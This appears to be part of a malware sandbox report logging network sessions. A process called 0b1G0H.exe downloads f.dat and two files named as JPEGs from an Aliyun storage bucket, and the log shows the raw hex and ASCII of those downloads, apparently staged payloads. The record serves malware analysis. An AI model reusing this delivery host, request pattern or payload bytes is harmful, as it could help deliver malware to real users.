                                                                            Data Ascii: 9:^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                                            2025-01-15 08:03:02 UTC956INData Raw: b0 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37
                                                                            Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.449776118.178.60.94437752C:\Users\user\Documents\0b1G0H.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:03:05 UTC110OUTGET /f.dat HTTP/1.1
                                                                            User-Agent: GetData
                                                                            Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                            Cache-Control: no-cache
                                                                            2025-01-15 08:03:06 UTC558INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:03:06 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 879
                                                                            Connection: close
                                                                            x-oss-request-id: 67876BBAE001B43834D27A00
                                                                            Accept-Ranges: bytes
                                                                            ETag: "E54C4296F011EC91D935AA353C936E34"
                                                                            Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 11142793972884948456
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000113
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                                            x-oss-server-time: 4
                                                                            2025-01-15 08:03:06 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                                            Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.449791118.178.60.94437752C:\Users\user\Documents\0b1G0H.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:03:07 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                                            User-Agent: GetData
                                                                            Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                            Cache-Control: no-cache
                                                                            2025-01-15 08:03:07 UTC547INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:03:07 GMT
                                                                            Content-Type: image/jpeg
                                                                            Content-Length: 55085
                                                                            Connection: close
                                                                            x-oss-request-id: 67876BBB53726E3737F8F6AA
                                                                            Accept-Ranges: bytes
                                                                            ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                                            Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 12339968747348072397
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000105
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                                            x-oss-server-time: 39
                                                                            2025-01-15 08:03:07 UTC3549INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                            Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                            2025-01-15 08:03:07 UTC4096INData Raw: 7c 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f
                                                                            Data Ascii: ||{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                                            2025-01-15 08:03:07 UTC4096INData Raw: f7 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa
                                                                            Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                                            2025-01-15 08:03:07 UTC4096INData Raw: f7 b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f
                                                                            Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                                            2025-01-15 08:03:07 UTC4096INData Raw: c6 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b
                                                                            Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                                            2025-01-15 08:03:07 UTC4096INData Raw: 7d 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b
                                                                            Data Ascii: }PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}
                                                                            2025-01-15 08:03:07 UTC4096INData Raw: f0 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94
                                                                            Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                                            2025-01-15 08:03:07 UTC4096INData Raw: f7 ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0
                                                                            Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                                            2025-01-15 08:03:07 UTC4096INData Raw: 82 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f
                                                                            Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                                            2025-01-15 08:03:07 UTC4096INData Raw: ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90
                                                                            Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.449804118.178.60.94437752C:\Users\user\Documents\0b1G0H.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:03:09 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                                            User-Agent: GetData
                                                                            Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                            Cache-Control: no-cache
                                                                            2025-01-15 08:03:09 UTC548INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:03:09 GMT
                                                                            Content-Type: image/jpeg
                                                                            Content-Length: 4859125
                                                                            Connection: close
                                                                            x-oss-request-id: 67876BBD3D5385373284EBC6
                                                                            Accept-Ranges: bytes
                                                                            ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                                            Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 9060732723227198118
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000105
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                                            x-oss-server-time: 11
                                                                            2025-01-15 08:03:09 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                            Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                            2025-01-15 08:03:09 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                                                            Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                                            2025-01-15 08:03:09 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                                                            Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                                            2025-01-15 08:03:09 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                                                            Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                                            2025-01-15 08:03:09 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                                                            Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
